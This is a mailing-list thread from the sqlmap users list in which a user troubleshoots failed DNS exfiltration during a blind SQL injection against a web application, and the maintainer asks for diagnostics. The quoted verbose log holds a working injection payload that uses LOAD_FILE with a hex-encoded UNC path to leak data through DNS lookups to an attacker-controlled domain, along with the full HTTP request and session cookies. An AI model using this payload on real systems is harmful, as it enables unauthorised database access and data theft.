Re: [sqlmap-users] Problem with dns exfiltration
Brought to you by:
inquisb
From: Miroslav S. <mir...@gm...> - 2014-01-23 07:42:40
|
Hi Chris. It looks quite right. It would be tremendously helpful if you could send a console output and a tcpdump (you can limit to only port 53) for a following run: sudo python sqlmap.py -u "...." --flush-session --banner --dns-domain="..." >From your given description it looks like everything should be up and running. Kind regards, Miroslav Stampar On Thu, Jan 23, 2014 at 12:46 AM, Chris Clements <ccl...@ou...>wrote: > Hey all, > > I’ve got a blind sqli that I’m exploiting with the latest sqlmap commit > and am trying to get dns exfil to work, but am not having any luck. > > I start sqlmap as root with the —dns-domain option set to a domain that I > control and have the sqlmap machine set as the authoritative NS for. > Running with a -v6, this is the info I get: > > =============================================== > [18:22:18] [INFO] testing for data retrieval through DNS channel > [18:22:18] [PAYLOAD] -2931 OR 7252=IF((ORD(MID((SELECT > LOAD_FILE(CONCAT(0x5c5c5c5c4d776a2e,(SELECT HEX(MID((IFNULL(CAST(8315 AS > CHAR),0x20)),1,31))),0x2e79564e2e73656375726566696c652e6e65745c5c7456414c))),6,1))>953),SLEEP(5),7252)-- > PyBa > [18:22:18] [TRAFFIC OUT] HTTP request [#3]: > GET > /administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate > HTTP/1.1 > Accept-language: en-us,en;q=0.5 > Accept-encoding: gzip,deflate > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > User-agent: Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.1) > Gecko/2008071719 Firefox/3.0.1 > Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 > > Pragma: no-cache > Cache-control: no-cache,no-store > Cookie: > Login=1;activeProfile=16469185;serviceID=1320;91370904fbecd1edf649755d657f5d32=97t8br06sreu9r846bai0t2pj0;mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec > Connection: close > > [18:22:19] [TRAFFIC IN] HTTP response [#3] (200 OK): > Content-length: 8627 > Content-encoding: gzip > Set-cookie: serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; > httponly, serviceID=1320; expires=Thu, 23-Jan-2014 00:22:20 GMT; path=/; > httponly, mcid_token=0c7264be-28af-41b8-8c77-01c4fdc395ec; expires=Thu, > 22-Jan-2015 23:22:20 GMT; path=/; httponly > Expires: Mon, 1 Jan 2001 00:00:00 GMT > Vary: Accept-Encoding > Uri: > https://target.net:443/administrator/index.php?option=com_mcsearch&templateId=-2931%20OR%207252%3DIF%28%28ORD%28MID%28%28SELECT%20LOAD_FILE%28CONCAT%280x5c5c5c5c4d776a2e%2C%28SELECT%20HEX%28MID%28%28IFNULL%28CAST%288315%20AS%20CHAR%29%2C0x20%29%29%2C1%2C31%29%29%29%2C0x2e79564e2e73656375726566696c652e6e65745c5c7456414c%29%29%29%2C6%2C1%29%29%3E953%29%2CSLEEP%285%29%2C7252%29--%20PyBa/&view=searchtemplate > Server: Apache > Last-modified: Wed, 22 Jan 2014 23:22:20 GMT > Connection: close > Pragma: no-cache > Cache-control: post-check=0, pre-check=0 > Date: Wed, 22 Jan 2014 23:22:20 GMT > P3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" > Content-type: text/html; charset=utf-8 > > [18:22:19] [DEBUG] performed 1 queries in 0.51 seconds > [18:22:19] [ERROR] data retrieval through DNS channel failed. Turning off > DNS exfiltration support > =============================================== > > If I run a tcpdump on the sqlmap machine, I see dns requests come in for “ > target.net” and if I do manual dns queries to the domain I own, sqlmap > responds as expected with localhost.domain.com. > > > Any idea? Am I doing anything wrong? > > > Chris > > > > ------------------------------------------------------------------------------ > CenturyLink Cloud: The Leader in Enterprise Cloud Services. > Learn Why More Businesses Are Choosing CenturyLink Cloud For > Critical Workloads, Development Environments & Everything In Between. > Get a Quote or Start a Free Trial Today. > > http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |